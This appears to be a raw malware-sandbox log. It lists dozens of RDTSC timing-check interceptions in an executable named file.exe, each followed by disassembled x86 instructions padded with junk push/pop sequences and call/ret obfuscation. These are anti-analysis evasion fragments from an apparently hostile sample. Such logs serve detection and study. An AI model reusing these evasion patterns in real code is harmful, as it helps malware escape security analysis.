    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D39E second address: 87D3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F2CB4E5A4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D3A9 second address: 87D3AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880290 second address: 8802A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F2CB4E5A4C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8802A3 second address: 8802B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2CB4F07456h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8802B8 second address: 8802BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8802BC second address: 8802C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8802C0 second address: 8802D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8802D5 second address: 8802F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2CB4F0745Fh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8802F0 second address: 703A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, ecx 0x0000000c push dword ptr [ebp+122D01F1h] 0x00000012 mov si, bx 0x00000015 call dword ptr [ebp+122D1B62h] 0x0000001b pushad 0x0000001c jns 00007F2CB4E5A4CCh 0x00000022 xor eax, eax 0x00000024 pushad 0x00000025 and cx, 9E5Eh 0x0000002a or cl, 00000071h 0x0000002d popad 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 or dword ptr [ebp+122D2F83h], esi 0x00000038 mov dword ptr [ebp+122D388Dh], eax 0x0000003e stc 0x0000003f mov esi, 0000003Ch 0x00000044 cld 0x00000045 mov dword ptr [ebp+122D3582h], eax 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f pushad 0x00000050 mov al, dh 0x00000052 push eax 0x00000053 or dword ptr [ebp+122D2642h], ecx 0x00000059 pop edi 0x0000005a popad 0x0000005b lodsw 0x0000005d sub dword ptr [ebp+122D3582h], edi 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 jne 00007F2CB4E5A4CCh 0x0000006d or dword ptr [ebp+122D3582h], esi 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 or dword ptr [ebp+122D35F9h], eax 0x0000007d push eax 0x0000007e push edi 0x0000007f pushad 0x00000080 jng 00007F2CB4E5A4C6h 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880335 second address: 8803D6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CB4F07458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F2CB4F07458h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F2CB4F0745Dh 0x0000002c or dword ptr [ebp+122D35C1h], ecx 0x00000032 mov edx, 0A72DAA4h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a mov si, bx 0x0000003d pop esi 0x0000003e push 32B95A55h 0x00000043 js 00007F2CB4F07465h 0x00000049 jmp 00007F2CB4F0745Fh 0x0000004e xor dword ptr [esp], 32B95AD5h 0x00000055 mov dword ptr [ebp+122D1F89h], edx 0x0000005b push 00000003h 0x0000005d mov esi, 2CBFDFDDh 0x00000062 push 00000000h 0x00000064 mov ecx, dword ptr [ebp+122D386Dh] 0x0000006a push 00000003h 0x0000006c mov edx, 40E02065h 0x00000071 push F1883475h 0x00000076 pushad 0x00000077 pushad 0x00000078 push edi 0x00000079 pop edi 0x0000007a jno 00007F2CB4F07456h 0x00000080 popad 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8803D6 second address: 8803DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8803DA second address: 880427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 31883475h 0x0000000e push edi 0x0000000f mov dx, cx 0x00000012 pop edi 0x00000013 mov esi, 0CDB1576h 0x00000018 lea ebx, dword ptr [ebp+124501F9h] 0x0000001e jmp 00007F2CB4F07464h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F2CB4F07464h 0x0000002c push esi 0x0000002d pop esi 0x0000002e popad 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880427 second address: 88042D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88042D second address: 880431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88049B second address: 88049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88049F second address: 8804A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8804A5 second address: 8804EF instructions: 0x00000000 rdtsc 0x00000002 je 00007F2CB4E5A4CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 565CBA3Ch 0x00000011 mov esi, eax 0x00000013 push 00000003h 0x00000015 xor dword ptr [ebp+122D358Fh], esi 0x0000001b push 00000000h 0x0000001d mov edi, dword ptr [ebp+122D284Ah] 0x00000023 push 00000003h 0x00000025 jmp 00007F2CB4E5A4D5h 0x0000002a push B0754DE6h 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0800 second address: 8A0813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F0745Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0813 second address: 8A0834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D1h 0x00000007 jp 00007F2CB4E5A4D2h 0x0000000d js 00007F2CB4E5A4C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B111 second address: 86B119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B119 second address: 86B130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B130 second address: 86B134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E6AA second address: 89E6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89E6B0 second address: 89E6D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2CB4F07456h 0x00000008 jnp 00007F2CB4F07456h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jc 00007F2CB4F07456h 0x00000017 jc 00007F2CB4F07456h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EAFD second address: 89EB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CCh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EB19 second address: 89EB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2CB4F07456h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EE3D second address: 89EE43 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EE43 second address: 89EE68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F0745Dh 0x00000007 jl 00007F2CB4F0745Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jng 00007F2CB4F07460h 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EFD7 second address: 89EFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F29D second address: 89F2A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F2A3 second address: 89F2CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2CB4E5A4CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2CB4E5A4D0h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F2CE second address: 89F2D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F6BF second address: 89F6C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F6C3 second address: 89F6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F2CB4F0745Eh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F953 second address: 89F957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F957 second address: 89F969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F0745Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F969 second address: 89F96E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F96E second address: 89F990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F2CB4F0745Eh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FEE1 second address: 89FF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4E5A4CDh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F2CB4E5A4D2h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FF07 second address: 89FF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F2CB4F0745Ah 0x00000008 jne 00007F2CB4F07456h 0x0000000e pop eax 0x0000000f jmp 00007F2CB4F07461h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F2CB4F0745Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 jne 00007F2CB4F07456h 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A00C3 second address: 8A00DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2CB4E5A4CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F2CB4E5A4C6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0216 second address: 8A0227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2CB4F07456h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0227 second address: 8A022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A022D second address: 8A0231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0231 second address: 8A0249 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3745 second address: 8A374B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2343 second address: 8A2347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5434 second address: 8A543A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87514E second address: 875154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875154 second address: 875160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD45C second address: 8AD460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD460 second address: 8AD495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2CB4F0745Bh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2CB4F07460h 0x00000014 jmp 00007F2CB4F07460h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD495 second address: 8AD49E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A4E second address: 871A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F07463h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A65 second address: 871A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A69 second address: 871A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A75 second address: 871A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A79 second address: 871A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F0745Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A8D second address: 871ACB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2CB4E5A4DFh 0x00000008 jmp 00007F2CB4E5A4D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F2CB4E5A4D9h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871ACB second address: 871AD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFE08 second address: 8AFE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F2CB4E5A4C6h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFE17 second address: 8AFE2C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 ja 00007F2CB4F07474h 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F2CB4F07456h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFE2C second address: 8AFE30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFE30 second address: 8AFE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F2CB4F0745Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B00FD second address: 8B0103 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0484 second address: 8B048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1150 second address: 8B1156 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1491 second address: 8B1496 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B15B4 second address: 8B15BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1745 second address: 8B1749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1C20 second address: 8B1C3B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CB4E5A4CCh 0x00000008 jnc 00007F2CB4E5A4C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F2CB4E5A4C8h 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1C3B second address: 8B1C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07462h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a movzx edi, si 0x0000000d push eax 0x0000000e pushad 0x0000000f jp 00007F2CB4F0745Ch 0x00000015 je 00007F2CB4F07456h 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1ED8 second address: 8B1EFC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2CB4E5A4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2CB4E5A4D6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1EFC second address: 8B1F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2200 second address: 8B2237 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007F2CB4E5A4C6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub esi, 4B00334Eh 0x00000015 xchg eax, ebx 0x00000016 push ebx 0x00000017 jmp 00007F2CB4E5A4D9h 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2712 second address: 8B2724 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2CB4F07456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4219 second address: 8B4220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B39C0 second address: 8B39C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B42B9 second address: 8B42BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4E5A second address: 8B4E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4E60 second address: 8B4E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4C01 second address: 8B4C07 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5991 second address: 8B59EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b mov di, si 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F2CB4E5A4C8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push edx 0x0000002b or edi, dword ptr [ebp+122D36E1h] 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 jng 00007F2CB4E5A4D2h 0x0000003b js 00007F2CB4E5A4CCh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7980 second address: 8B7985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
